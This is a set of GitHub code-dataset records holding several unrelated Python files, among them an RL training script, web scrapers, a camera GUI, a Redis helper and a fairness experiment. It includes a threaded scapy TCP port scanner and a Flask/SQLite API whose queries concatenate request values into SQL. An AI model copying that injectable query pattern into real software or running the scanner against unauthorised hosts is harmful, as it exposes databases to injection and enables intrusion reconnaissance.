tensorboard.add_scalar('{}/loss'.format(algo_name), loss,\n cum_steps) # mean of total loss\n tensorboard.add_scalar('{}/exploration'.format(algo_name),\n agent.curr_ep, cum_steps)\n\n pbar.update(steps)\n\n # perform evaluation\n if cum_steps // args.test_every_steps >= test_flag:\n while cum_steps // args.test_every_steps >= test_flag:\n test_flag += 1\n\n pbar.write('testing')\n eval_rewards_mean = run_evaluate_episodes(agent, test_env)\n\n logger.info(\n 'eval_agent done, (steps, eval_reward): ({}, {})'.format(\n cum_steps, eval_rewards_mean))\n\n tensorboard.add_scalar(\n '{}/mean_validation_rewards'.format(algo_name),\n eval_rewards_mean, cum_steps)\n\n pbar.close()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--env', help='name of the atari env', default='PongNoFrameskip-v4')\n parser.add_argument(\n '--algo',\n default='DQN',\n type=str,\n help='DQN/DDQN, represent DQN, double DQN respectively')\n parser.add_argument(\n '--dueling',\n default=False,\n type=bool,\n help='if True, represent dueling DQN or dueling DDQN')\n parser.add_argument(\n '--train_total_steps',\n type=int,\n default=int(1e7),\n help='maximum environmental steps of games')\n parser.add_argument(\n '--test_every_steps',\n type=int,\n default=100000,\n help='the step interval between two consecutive evaluations')\n parser.add_argument(\n '--train_seed',\n type=int,\n default=66166616,\n help='set the random seed for training environment')\n parser.add_argument(\n '--test_seed',\n type=int,\n default=666616,\n help='set the random seed for test and eval environment')\n\n args = parser.parse_args()\n main()\n","repo_name":"jianzhnie/deep-rl-toolkit","sub_path":"benchmark/dqn/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6169,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"7"} +{"seq_id":"1347893523","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport datetime\r\nimport pandas as pd\r\n\r\n# scraping the data of to 25 repositories of each trending topics\r\ngithub_topics_url = 'https://github.com/topics'\r\nr = requests.get(url = github_topics_url)\r\n# print(len(r.text)) \r\npage_content = r.text\r\n\r\n# # print(page_content[:1000])\r\n# with open('webpage.html', 'w') as f:\r\n# f.write(page_content[:10000])\r\n\r\nsoup1 = BeautifulSoup(page_content, 'html.parser')\r\nsoup= BeautifulSoup(soup1.prettify(), 'html.parser')\r\n\r\n# scraping topic title tags \r\ntitle_class =\"f3 lh-condensed mb-0 mt-1 Link--primary\"\r\ntopic_title_tags = soup.find_all('p',{'class' :title_class})\r\ntopic_title = []\r\nfor tag in topic_title_tags:\r\n topic_title.append(tag.text.strip( ))\r\n# print(topic_title)\r\n\r\n\r\n# scraping topic description\r\ndescp_class = \"f5 color-fg-muted mb-0 mt-1\"\r\ntopic_descp_tags= soup.find_all('p', {'class': descp_class})\r\ntopic_descp = []\r\nfor descp in topic_descp_tags:\r\n topic_descp.append(descp.text.strip( ))\r\n# print(topic_descp)\r\n\r\n\r\n# scraping topic links\r\nlink_class = \"no-underline flex-grow-0\"\r\ntopic_links_tags= soup.find_all('a', {'class': link_class})\r\ntopic_links = []\r\nbase_link = \"http://github.com\"\r\nfor link in topic_links_tags:\r\n topic_links.append(base_link+ link['href'].strip())\r\n# print(topic_links)\r\n\r\n# creating a dataframe to store it as a .csv file\r\ntopics_dict = {'Title':topic_title, 'Description': topic_descp, 'Url': topic_links}\r\nscraped_topics_df = pd.DataFrame(topics_dict)\r\n# print(scraped_df)\r\nscraped_topics_df.to_csv(\"Topics.csv\",index=None)\r\n\r\n\r\n# Scraping the next page\r\nfor j in range(len(topic_title_tags)):\r\n topic_url= topic_links[j]\r\n r1 = requests.get(url = topic_url)\r\n topic_htmlcontent = r1.content\r\n topic_soup = BeautifulSoup(topic_htmlcontent,'html.parser')\r\n\r\n repo_tags = topic_soup.find_all('h3' , {'class' : \"f3 color-fg-muted text-normal lh-condensed\"})\r\n\r\n # scraping different details of this page\r\n # like username, urls, stars etc.\r\n\r\n def repo__details(i):\r\n repo_name_tag = repo_tags[i]\r\n repo_atag = repo_name_tag.find_all('a')\r\n\r\n username = repo_atag[0].get_text().strip()\r\n repo_name = repo_atag[1].get_text().strip()\r\n repo_url = base_link + repo_atag[1]['href']\r\n\r\n star_tags = topic_soup.find_all('span',{'id': 'repo-stars-counter-star'})\r\n repo_stars = star_tags[i].text\r\n\r\n def star_number(stars):\r\n if \"k\" in stars:\r\n return int(float(stars[:-1])*1000)\r\n else:\r\n return stars\r\n\r\n\r\n repo_stars_num = star_number(repo_stars)\r\n return username, repo_name, repo_url, repo_stars_num\r\n\r\n\r\n username_list=[]\r\n reponame_list=[]\r\n repourl_list=[]\r\n repostars_list=[]\r\n for i in range(len(repo_tags)):\r\n \r\n username_list.append(repo__details(i)[0])\r\n reponame_list.append(repo__details(i)[1])\r\n repourl_list.append(repo__details(i)[2])\r\n repostars_list.append(repo__details(i)[3])\r\n\r\n repo_details_dict = {'User Name': username_list, \r\n 'Repository Name': reponame_list,\r\n 'Repository Url' : repourl_list,\r\n 'Stars' : repostars_list}\r\n\r\n Repo_df = pd.DataFrame(repo_details_dict)\r\n\r\n # creating .csv file\r\n Repo_df.to_csv(f'{topic_title[j]}.csv',index = None) \r\n","repo_name":"iyushjha7/Github-web-scraping","sub_path":"Github_scraping.py","file_name":"Github_scraping.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"29516556703","text":"from turtle import width\nfrom django.db import models\nfrom PIL import Image\n\n# Create your models here.\nclass Upload(models.Model):\n picture = models.ImageField(null=True,upload_to='media/')\n\n def save(self, *args, **kwargs):\n\n super(Upload, self).save(*args, **kwargs)\n if self.picture: \n print(\"============ image found ===============\")\n im = Image.open(self.picture.path)\n width, height = im.size\n left = 5\n top = height / 4\n right = 164\n bottom = 3 * height / 4\n im1 = im.crop((left,top,right,bottom))\n im1.save(self.picture.path)\n ","repo_name":"AdhilAbbas/Machine-test","sub_path":"testing/app2/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22076498209","text":"import webbrowser\nimport asyncio\nimport aiohttp\nimport bs4\nimport requests\n\n\ndef new_url(url: list) -> str:\n if len(url) > 1:\n for c in range(len(url)-1):\n url[c] = url[c] + '%20'\n\n url = ''.join(url)\n url = 'https://pt.wikipedia.org/wiki/' + url.title()\n\n return url\n\n\nasync def search(url: str):\n return webbrowser.open(url)\n\n\ndef pegar_conteudo(link: str) -> str:\n rq = requests.get(link).text\n soup = bs4.BeautifulSoup(rq, \"html.parser\")\n result = soup.find(\"div\", {\"class\": \"mw-parser-output\"})\n\n texto = bs4.BeautifulSoup(result.decode(), \"html.parser\").find_all(\"p\")[0]\n\n return texto.text\n\n\nif __name__ == '__main__':\n url = input('Digite o que você quer pesquisar: ').split()\n\n # t1 = asyncio.run(search(fuc_url))\n result = pegar_conteudo(new_url(url))\n\n print(f'\\nResumo: {result}')\n","repo_name":"davilos/Projetos","sub_path":"pesquisa.py","file_name":"pesquisa.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33145342493","text":"from scapy.all import *\nimport optparse\nimport threading\n\ndef scan(ip,port):\n pkt=IP(dst=ip)/TCP(dport=int(port))\n res=sr1(pkt,timeout=0.1,verbose=0)\n try:\n if int(res[TCP].flags)==18:\n print(port,' is open')\n except:\n pass\n\ndef main():\n parser=optparse.OptionParser('%prog '+\"xxx\")\n parser.add_option('-t',dest='target',type='string',help='Target')\n parser.add_option('-p',dest='port',type='string',help='Port(eg:22,80 1-500)')\n (options,args)=parser.parse_args()\n target=options.target\n if(',' in options.port):\n ports=str(options.port).split(',')\n if ((target==None) or (ports[0]==None)):\n print('Please input target(-t) and port(-p)!')\n exit(0)\n for port in ports:\n t=threading.Thread(target=scan,args=(target,port))\n t.start()\n elif('-' in options.port):\n ports=str(options.port).split('-')\n for port in range(int(ports[0]),int(ports[1])):\n t=threading.Thread(target=scan,args=(target,port))\n t.start()\n\nif __name__=='__main__':\n main()","repo_name":"zmqq/pytools","sub_path":"tcpscan/tcpscan.py","file_name":"tcpscan.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"16647680144","text":"#Matthew Leung\n#March 2022\n\nimport numpy as np\nfrom matrixvision_harvester_class import matrixvision_harvester_class as matrixvision_harvester_class\nfrom pyqtgraph.Qt import QtCore, QtGui\nimport pyqtgraph as pg\nimport pyqtgraph.ptime as ptime\n\n###############################################################################\n\ncti_filename = r\"C:\\Program Files\\MATRIX VISION\\mvIMPACT Acquire\\bin\\x64\\mvGenTLProducer.cti\"\n\ncamera_obj = matrixvision_harvester_class()\ncamera_obj.init_camera(cti_filename)\ncamera_obj.start_camera_acquisition(pixel_format='Mono8')\ncamera_obj.set_min_exposure_time(10)\ncamera_obj.set_exposure(exp_time=10)\ncamera_obj.set_frame_rate(5) #Set to 10 FPS\n\n###############################################################################\n\napp = QtGui.QApplication([])\n\n# Interpret image data as row-major instead of col-major\npg.setConfigOptions(imageAxisOrder='row-major') #VERY IMPORTANT LINE!\n\nview = pg.GraphicsView()\nl = pg.GraphicsLayout(border=(100,100,100))\nview.setCentralItem(l)\nview.show()\nview.setWindowTitle('Far Field Alignment')\n#view.resize(800,600)\nview.showMaximized()\n\n#Title at top\ntext = \"G-CLEF Fiber Lab - Far Field Alignment GUI\"\ntitle_obj = l.addLabel(text, col=0, colspan=3) #title_obj is of type pyqtgraph.graphicsItems.LabelItem.LabelItem\ntitle_obj.setText(text, color=\"#EEEEEE\", size=\"24pt\", bold=True, italic=False)\nl.nextRow()\n\norig_width = camera_obj.WIDTH\norig_height = camera_obj.HEIGHT\n#Add 2 plots into the first row (automatic position)\np1 = l.addPlot(title=\"Original Image\") #Instead of using ViewBox, use plot\np1.setAspectLocked(lock=True, ratio=1) #LOCK ASPECT SO IMAGE IS DISPLAYED PROPERLY\ndata = np.random.normal(size=(orig_width,orig_height))\nimg1 = pg.ImageItem(data)\nimg1.setOpts(border={'width':1})\np1.addItem(img1)\n\n# Custom ROI for selecting an image region\nroi = pg.ROI(pos=[int(orig_width/4), int(orig_height/4)], size=[int(orig_width/2), int(orig_height/2)])\nroi.addScaleHandle([0.5, 1], [0.5, 0.5])\nroi.addScaleHandle([0, 0.5], [0.5, 0.5])\np1.addItem(roi)\nroi.setZValue(10) # make sure ROI is drawn above image\n\np2 = l.addPlot(title=\"Cropped Image\")\np2.setAspectLocked(lock=True, ratio=1) #LOCK ASPECT SO IMAGE IS DISPLAYED PROPERLY\ncropped_data = roi.getArrayRegion(data, img1)\nimg2 = pg.ImageItem(cropped_data)\nimg2.setOpts(border={'width':1})\np2.addItem(img2)\n\n\np3 = l.addPlot() #p3 is of type pyqtgraph.graphicsItems.PlotItem.PlotItem.PlotItem\n#Change tick font size\n#https://stackoverflow.com/questions/41723497/how-to-change-ticks-fontsize-of-a-plot-using-pyqtgraph\nfont=QtGui.QFont()\nfont.setPixelSize(20)\np3.getAxis(\"bottom\").setStyle(tickFont = font)\np3.getAxis(\"bottom\").setStyle(tickTextOffset = 20)\np3.getAxis(\"left\").setStyle(tickFont = font)\np3.getAxis(\"left\").setStyle(tickTextOffset = 20)\n\n#Change label font size and color\n#https://stackoverflow.com/a/56904913\nlabel_style = {\"color\": \"#EEEEEE\", \"font-size\": \"16pt\"}\np3.setTitle(\"Far Field Beam Eccentricity VS Time\", color=\"#EEEEEE\", size=\"18pt\")\np3.setLabel(\"bottom\", \"Time\", **label_style)\np3.setLabel(\"left\", \"Eccentricity\", **label_style)\n\np3.showGrid(x = True, y = True, alpha = 0.5) #add grid\n\nproxy = QtGui.QGraphicsProxyWidget()\ncb = QtGui.QCheckBox('Crop and Fit')\nproxy.setWidget(cb)\nl.nextRow()\nl2 = l.addLayout(rowspan=3)\nl2.addItem(proxy,row=0,col=0)\n\n###############################################################################\n\ndata1 = np.random.normal(size=300)\npen2 = pg.mkPen(color=\"#FF0000\")\ncurve2 = p3.plot(data1, pen=pen2)\nptr1 = 0\ndef update1():\n global data1, ptr1\n data1[:-1] = data1[1:] # shift data in the array one sample left\n # (see also: np.roll)\n data1[-1] = np.random.normal()\n \n ptr1 += 1\n curve2.setData(data1)\n curve2.setPos(ptr1, 0)\n\n###############################################################################\n\nupdateTime = ptime.time()\nfps = 0\n\ndef imageHoverEvent(event):\n \"\"\"Show the position, pixel, and value under the mouse cursor.\n \"\"\"\n global img2, cropped_data\n if event.isExit():\n p2.setTitle(\"\")\n return\n pos = event.pos()\n i, j = pos.y(), pos.x()\n i = int(np.clip(i, 0, cropped_data.shape[0] - 1))\n j = int(np.clip(j, 0, cropped_data.shape[1] - 1))\n val = cropped_data[i, j]\n ppos = img2.mapToParent(pos)\n x, y = ppos.x(), ppos.y()\n p2.setTitle(\"pos: (%0.1f, %0.1f) pixel: (%d, %d) value: %g\" % (x, y, i, j, val))\n\n# Monkey-patch the image to use our custom hover function. \n# This is generally discouraged (you should subclass ImageItem instead),\n# but it works for a very simple use like this. \nimg2.hoverEvent = imageHoverEvent\n\n\n\ndef updateData():\n global img1, updateTime, fps, data, cropped_data\n\n data = camera_obj.get_snapshot_np_array()\n #data = data.transpose(1, 0, 2)\n #data = np.flip(data, 1)\n data = data[:,:,0]\n camera_obj.buffer.queue()\n del camera_obj.buffer\n\n ## Display the data\n img1.setImage(data)\n update1()\n\n cropped_data = roi.getArrayRegion(data, img1)\n img2.setImage(cropped_data)\n\n QtCore.QTimer.singleShot(1, updateData)\n now = ptime.time()\n fps2 = 1.0 / (now-updateTime)\n updateTime = now\n fps = fps * 0.9 + fps2 * 0.1\n \nupdateData()\n\n\nif __name__ == '__main__':\n \n #Start Qt event loop unless running in interactive mode\n import sys\n if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n QtGui.QApplication.instance().exec_()\n camera_obj.done_camera()\n print(\"Done!\")","repo_name":"mattleung10/G-CLEF_Fiber_Lab","sub_path":"Matrix_Vision_Interface/Using_Harvester/pyqtgraph_test/pyqtgraph_video_test_ROI.py","file_name":"pyqtgraph_video_test_ROI.py","file_ext":"py","file_size_in_byte":5501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"20460160654","text":"from flask import Flask,jsonify,request\nimport sqlite3,json\n\napp = Flask(__name__)\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Origin', '*')\n response.headers.add('Access-Control-Allow-Headers', 'Content-Type, authorization' )\n response.headers.add('Access-Control-Allow-Methods', 'GET, POST, OPTIONS, PUT, DELETE')\n return response\n\ndef dict_factory(cursor, row):\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d\n\n######## Category #########\n@app.route('/category',methods = ['GET'])\ndef category():\n try:\n conn = sqlite3.connect('products.db')\n conn.row_factory = dict_factory\n cur = conn.cursor()\n cur.execute(\"select * from category\")\n rows = cur.fetchall()\n cur.close()\n\n return jsonify(rows)\n except:\n jsonify({'status': 400,'message': 'Failed to read data from category table'}),400\n\n\n@app.route('/category',methods = ['POST'])\ndef insertcategory():\n try:\n _json = request.json\n _category_name = _json['category_name']\n\n with sqlite3.connect(\"products.db\") as con:\n cur = con.cursor()\n cur.execute(\"INSERT INTO category(category_name) VALUES ('\"+_category_name+\"')\")\n con.commit()\n cur.close()\n\n return jsonify({'status': 200,'message': 'Insert Successfull'}),200\n\n except:\n jsonify({'status': 400,'message': 'Failed to insert data into from product table'}),400\n\n@app.route('/category',methods = ['PUT'])\ndef updatecategory():\n try:\n _json = request.json\n _id = _json['id']\n _category_name = _json['category_name']\n print(_id,_category_name)\n conn = sqlite3.connect('products.db')\n conn.row_factory = dict_factory\n cur = conn.cursor()\n cur.execute(\"Update category set category_name = '\"+_category_name+\"' where id = \"+_id)\n conn.commit()\n cur.close()\n\n return jsonify({'status': 201,'message': 'Update Successfull'}),201\n\n except:\n jsonify({'status': 400,'message': 'Failed to update from product table'}),400\n\n@app.route('/category',methods = ['DELETE'])\ndef deletecategory():\n try:\n _json = request.json\n _id = _json['id']\n\n conn = sqlite3.connect('products.db')\n conn.row_factory = dict_factory\n cur = conn.cursor()\n cur.execute(\"DELETE from category where id = \"+_id)\n conn.commit()\n cur.close()\n\n return jsonify({'status': 202,'message': 'Delete Successfull'}),202\n\n except:\n jsonify({'status': 400,'message': 'Failed to delete record from product table'}),400\n\n\n########## Product ###########\n@app.route('/product',methods = ['GET'])\ndef product():\n try:\n conn = sqlite3.connect('products.db')\n conn.row_factory = dict_factory\n cur = conn.cursor()\n cur.execute(\"select p.id,p.product_name,c.category_name from products p INNER JOIN category c ON p.category=c.id;\")\n rows = cur.fetchall()\n cur.close()\n\n return jsonify(rows)\n\n except:\n jsonify({'status': 400,'message': 'Failed to read data from product table'}),400\n\n\n@app.route('/product',methods = ['POST'])\ndef insertproduct():\n try:\n _json = request.json\n _product_name = _json['product_name']\n _category = _json['category']\n\n conn = sqlite3.connect('products.db')\n conn.row_factory = dict_factory\n cur = conn.cursor()\n cur.execute(\"INSERT INTO products(product_name, category) VALUES ('\"+_product_name+\"',\"+_category+\")\")\n conn.commit()\n cur.close()\n\n return jsonify({'status': 200,'message': 'Insert Successfull'}),200\n\n except:\n jsonify({'status': 400,'message': 'Failed to insert data into from product table'}),400\n\n@app.route('/product',methods = ['PUT'])\ndef updateproduct():\n try:\n _json = request.json\n _id = _json['id']\n _product_name = _json['product_name']\n _category = _json['category']\n\n conn = sqlite3.connect('products.db')\n conn.row_factory = dict_factory\n cur = conn.cursor()\n cur.execute(\"Update products set product_name = '\"+_product_name+\"', category = \"+_category+\" where id = \"+_id)\n conn.commit()\n cur.close()\n\n return jsonify({'status': 201,'message': 'Update Successfull'}),201\n\n except:\n jsonify({'status': 400,'message': 'Failed to update from product table'}),400\n\n@app.route('/product',methods = ['DELETE'])\ndef deleteproduct():\n try:\n _json = request.json\n _id = _json['id']\n\n conn = sqlite3.connect('products.db')\n conn.row_factory = dict_factory\n cur = conn.cursor()\n cur.execute(\"DELETE from products where id = \"+_id)\n conn.commit()\n cur.close()\n\n return jsonify({'status': 202,'message': 'Delete Successfull'}),202\n\n except:\n jsonify({'status': 400,'message': 'Failed to delete record from product table'}),400\n\n\n@app.errorhandler(404)\ndef not_found(error=None):\n message = {\n 'status': 404,\n 'message': 'Not Found: ' + request.url,\n }\n resp = jsonify(message)\n resp.status_code = 404\n\n return resp\n\nif __name__ == '__main__':\n app.config['JSON_AS_ASCII'] = False\n app.run(debug=True)","repo_name":"sirexcuseme/api-example","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21103336968","text":"# tut01 solution\n# import pandas as pd and csv module\nimport csv\nimport pandas as pd\n# read the input file\nwith open('octant_input.csv','r') as input_file:\n reader=csv.reader(input_file)\n# write in output file\n with open('f.csv','w',newline='') as output_file:\n writer=csv.writer(output_file)\n for row in reader:\n writer.writerow(row)\ndata=pd.read_csv('f.csv')\n# taking average using predefine mean method\nu_avg=data['U'].mean()\nv_avg=data['V'].mean()\nw_avg=data['W'].mean()\n# write average on output file\ndata.at[0,'U_avg']=u_avg\ndata.at[0,'V_avg']=v_avg\ndata.at[0,'W_avg']=w_avg\nrow_no=0\n# initializing different octant \n# p1 ->positive 1 \n# n1 ->negative 1\ncount_p1=0\ncount_n1=0\ncount_p2=0\ncount_n2=0\ncount_p3=0\ncount_n3=0\ncount_p4=0\ncount_n4=0\n\n# making average columns \nfor ele in data['V']:\n x=data.at[row_no,\"U'=U-Uavg\"]=data.at[row_no,'U']-u_avg\n y=data.at[row_no,\"U'=U-Vavg\"]=data.at[row_no,'V']-v_avg\n z=data.at[row_no,\"U'=U-Wavg\"]=data.at[row_no,'W']-w_avg\n if x>0:\n if y>0:\n if z>0:\n data.at[row_no,'Octant']=1\n count_p1=count_p1+1\n else:\n data.at[row_no,'Octant']=-1\n count_n1=count_n1+1\n else:\n if z>0:\n data.at[row_no,'Octant']=4\n count_p4=count_p4+1\n else:\n data.at[row_no,'Octant']=-4\n count_n4=count_n4+1\n else:\n if y>0:\n if z>0:\n data.at[row_no,'Octant']=2\n count_p2=count_p2+1\n else:\n data.at[row_no,'Octant']=-2\n count_n2=count_n2+1\n else:\n if z>0:\n data.at[row_no,'Octant']=3\n count_p3=count_p3+1\n else:\n data.at[row_no,'Octant']=-3\n count_n3=count_n3+1\n row_no=row_no+1\n\n # count of all octant\ndata.at[0,'Octant ID']='Overall Count'\ndata.at[0,'1']=count_p1\ndata.at[0,'-1']=count_n1\ndata.at[0,'2']=count_p2\ndata.at[0,'-2']=count_n2\ndata.at[0,'3']=count_p3\ndata.at[0,'-3']=count_n3\ndata.at[0,'4']=count_p4\ndata.at[0,'-4']=count_n4\n\n #now for different mod range values\ncount_p1=0\ncount_n1=0\ncount_p2=0\ncount_n2=0\ncount_p3=0\ncount_n3=0\ncount_p4=0\ncount_n4=0\nlength=row_no\nmod=5000\nj=1\ncurr_p1=1\ncurr_p2=1\ncurr_p3=1\ncurr_p4=1\ncurr_n1=1\ncurr_n2=1\ncurr_n3=1\ncurr_n4=1\ncurr_oct=1\ncnt=0\n\nfor i in range(length):\n x=data.at[i,'Octant']\n if(x==1): count_p1+=1\n elif(x==2): count_p2+=1\n elif(x==3): count_p3+=1\n elif(x==4): count_p4+=1\n elif(x==-1): count_n1+=1\n elif(x==-2): count_n2+=1\n elif(x==-3): count_n3+=1\n elif(x==-4): count_n4+=1\n cnt+=1\n if(cnt==mod or i==length-1):\n cnt=0\n data.at[curr_p1,'1']=count_p1\n data.at[curr_p2,'2']=count_p2\n data.at[curr_p3,'3']=count_p3\n data.at[curr_p4,'4']=count_p4\n data.at[curr_n1,'-1']=count_n1\n data.at[curr_n2,'-2']=count_n2\n data.at[curr_n3,'-3']=count_n3\n data.at[curr_n4,'-4']=count_n4\n if(j==6):\n data.at[curr_oct,'Octant ID']=\"25001-30000\"\n elif(i==4999):\n str1=\"{} - {}\".format(i-mod+1, i+1)\n data.at[curr_oct,'Octant ID']=str1\n else:\n str1=\"{} - {}\".format(i-mod+2, i+1)\n data.at[curr_oct,'Octant ID']=str1\n curr_p1+=1\n curr_p2+=1\n curr_p3+=1\n curr_p4+=1\n curr_n1+=1\n curr_n2+=1\n curr_n3+=1\n curr_n4+=1\n curr_oct+=1\n\n count_p1=0\n count_n1=0\n count_p2=0\n count_n2=0\n count_p3=0\n count_n3=0\n count_p4=0\n count_n4=0\n j+=1\n\ndata.to_csv('f.csv',index=False)","repo_name":"ChetanChaudhary6/2001ME16_2022","sub_path":"tut01/tut01.py","file_name":"tut01.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"39279481449","text":"from typing import Dict, NoReturn, List\nfrom aioredis import Redis\n\n\nasync def assign(redis: Redis, user: int, name: str, value: str) -> NoReturn:\n tr = redis.pipeline()\n tr.hset(f\"aliases-{user}\", name, value)\n tr.sadd(\"aliases\", user)\n await tr.execute()\n\n\nasync def fetch(redis: Redis, user: int, names: str) -> str:\n return await redis.hget(f\"aliases-{user}\", names)\n\n\nasync def fetch_multi(redis: Redis, user: int, names: List[str]) -> str:\n return await redis.hmget(f\"aliases-{user}\", *names)\n\n\nasync def list(redis: Redis, user: int) -> Dict[str, str]:\n return await redis.hgetall(f\"aliases-{user}\")\n\n\nasync def delete(redis: Redis, user: int, name: str) -> NoReturn:\n tr = redis.pipeline()\n tr.hdel(f\"aliases-{user}\", name)\n alias_count = tr.hlen(f\"aliases-{user}\")\n await tr.execute()\n alias_count = await alias_count\n if alias_count == 0:\n await redis.srem(\"aliases\", user)\n\n\nasync def count(redis: Redis, user: int) -> int:\n return await redis.hlen(f\"aliases-{user}\")\n","repo_name":"NQN-Discord/redis_helper","sub_path":"redis_helper/emote_transform/alias.py","file_name":"alias.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"32758060498","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport sys\nsys.path.append('../../../')\nfrom utils.packages import *\nfrom utils.ml_fairness import *\nfrom utils.standard_data import *\ndir = 'res/titanic5-'\nd_fields = ['Pipeline', 'Stage', 'SF_SPD', 'SF_EOD', 'SF_AOD', 'SD_ERD', 'Acc', 'F1']\ndiff_file = dir + 'fairness' + '.csv'\nif(not os.path.isfile(diff_file)):\n with open(diff_file, 'a') as csvfile:\n csvwriter = csv.writer(csvfile)\n csvwriter.writerow(d_fields)\n\n\n# In[2]:\n\n\n# Load data\ntrain = pd.read_csv('../../../data/titanic/train.csv')\ntest = pd.read_csv('../../../data/titanic/test.csv')\ndf = train\n\n\n# In[3]:\n\n\n## BASIC PREP\ndf['Sex'] = df['Sex'].replace({'female': 0.0, 'male': 1.0})\n\ny1_df = df.copy()\n## Custom feature\ndf[\"Age\"] = df[\"Age\"].fillna(-0.5)\nbins = [-1, 0, 5, 12, 18, 24, 35, 60, np.inf]\nlabels = ['Unknown', 'Baby', 'Child', 'Teenager', 'Student', 'Young Adult', 'Adult', 'Senior']\ndf['AgeGroup'] = pd.cut(df[\"Age\"], bins, labels = labels)\n\ndf[\"CabinBool\"] = (df[\"Cabin\"].notnull().astype('int'))\n\ndf['Title'] = df.Name.str.extract(' ([A-Za-z]+)\\.', expand=False)\ndf['Title'] = df['Title'].replace(['Lady', 'Capt', 'Col',\n 'Don', 'Dr', 'Major', 'Rev', 'Jonkheer', 'Dona'], 'Rare')\n \ndf['Title'] = df['Title'].replace(['Countess', 'Lady', 'Sir'], 'Royal')\ndf['Title'] = df['Title'].replace('Mlle', 'Miss')\ndf['Title'] = df['Title'].replace('Ms', 'Miss')\ndf['Title'] = df['Title'].replace('Mme', 'Mrs')\ntitle_mapping = {\"Mr\": 1, \"Miss\": 2, \"Mrs\": 3, \"Master\": 4, \"Royal\": 5, \"Rare\": 6}\ndf['Title'] = df['Title'].map(title_mapping)\ndf['Title'] = df['Title'].fillna(0)\n\nage_title_mapping = {1: \"Young Adult\", 2: \"Student\", 3: \"Adult\", 4: \"Baby\", 5: \"Adult\", 6: \"Adult\"}\nfor x in range(len(train[\"AgeGroup\"])):\n if df[\"AgeGroup\"][x] == \"Unknown\":\n df[\"AgeGroup\"][x] = age_title_mapping[train[\"Title\"][x]]\n\nage_mapping = {'Baby': 1, 'Child': 2, 'Teenager': 3, 'Student': 4, 'Young Adult': 5, 'Adult': 6, 'Senior': 7}\ndf['AgeGroup'] = df['AgeGroup'].map(age_mapping)\n\ndf = df.fillna({\"Embarked\": \"S\"})\nembarked_mapping = {\"S\": 1, \"C\": 2, \"Q\": 3}\ndf['Embarked'] = df['Embarked'].map(embarked_mapping)\ndf['FareBand'] = pd.qcut(df['Fare'], 4, labels = [1, 2, 3, 4])\n\n\ndf = df.drop(['Fare'], axis = 1)\ndf = df.drop(['Cabin'], axis = 1)\ndf = df.drop(['Ticket'], axis = 1)\ndf = df.drop(['PassengerId'], axis = 1)\ndf = df.drop(['Name'], axis = 1)\n\n\ny1_df['Age'].fillna(y1_df['Age'].median(), inplace = True)\ny1_df = y1_df.fillna({\"Embarked\": \"S\"})\ny1_df['Embarked'] = y1_df['Embarked'].map(embarked_mapping)\ny1_df['Cabin'].fillna(y1_df['Cabin'].mode(), inplace = True)\n\n# One-hot encoder\ncat_feat = ['Cabin', 'Ticket', 'Embarked']\ny1_df = pd.get_dummies(y1_df, columns=cat_feat, prefix_sep='=')\n\n\ny1_df = y1_df.drop(['PassengerId'], axis = 1)\ny1_df = y1_df.drop(['Name'], axis = 1)\n\n\n# In[4]:\n\n\n\nseed = randrange(100)\ny2_train, y2_test = train_test_split(df, test_size = 0.3, random_state = seed) # stratify=df['loan']\ny1_train, y1_test = train_test_split(y1_df, test_size = 0.3, random_state = seed) # \n\npro_att_name = ['Sex']\npriv_class = [1]\nreamining_cat_feat = []\n\ny2_data_orig_train, y2_X_train, y2_y_train = load_titanic_data(y2_train, pro_att_name, priv_class, reamining_cat_feat)\ny2_data_orig_test, y2_X_test, y2_y_test = load_titanic_data(y2_test, pro_att_name, priv_class, reamining_cat_feat)\n\ny1_data_orig_train, y1_X_train, y1_y_train = load_titanic_data(y1_train, pro_att_name, priv_class, reamining_cat_feat)\ny1_data_orig_test, y1_X_test, y1_y_test = load_titanic_data(y1_test, pro_att_name, priv_class, reamining_cat_feat)\n\n\n\n\nfrom sklearn.ensemble import GradientBoostingClassifier\ny2_model = GradientBoostingClassifier()\ny2_mdl = y2_model.fit(y2_X_train,y2_y_train) \n\ny1_model = GradientBoostingClassifier()\ny1_mdl = y1_model.fit(y1_X_train,y1_y_train) \n\n\n# plot_model_performance(y2_mdl, y2_X_test, y2_y_test)\ny1_pred, y1_fair = get_fair_metrics_and_plot('filename', y1_data_orig_test, y1_mdl)\ny2_pred, y2_fair = get_fair_metrics_and_plot('filename', y2_data_orig_test, y2_mdl)\n\n\n\ny1_fair = y1_fair.drop(['DI', 'CNT', 'TI'], axis=1)\ny2_fair = y2_fair.drop(['DI', 'CNT', 'TI'], axis=1)\nCVR, CVD, AVR_EOD, AVD_EOD, AVR_SPD, AVD_SPD, AVD_AOD, AV_ERD = compute_new_metrics(y2_data_orig_test, y1_pred, y2_pred)\nrow_y1 = y1_fair.iloc[[0]].values[0].tolist()\nrow_y2 = 